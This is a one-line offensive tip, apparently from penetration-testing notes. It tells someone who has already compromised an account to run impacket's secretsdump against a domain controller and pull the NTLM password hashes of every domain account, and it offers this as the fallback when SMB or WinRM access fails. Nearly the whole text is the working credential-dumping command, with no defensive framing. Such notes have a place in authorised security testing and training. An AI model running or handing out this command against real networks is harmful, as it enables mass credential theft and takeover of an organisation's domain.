Try this against the DC after you've compromised an account, espectially if you cannot smb or winrm into DC ``` impacket-secretsdump -just-dc-ntlm domain.local/user@$IP ```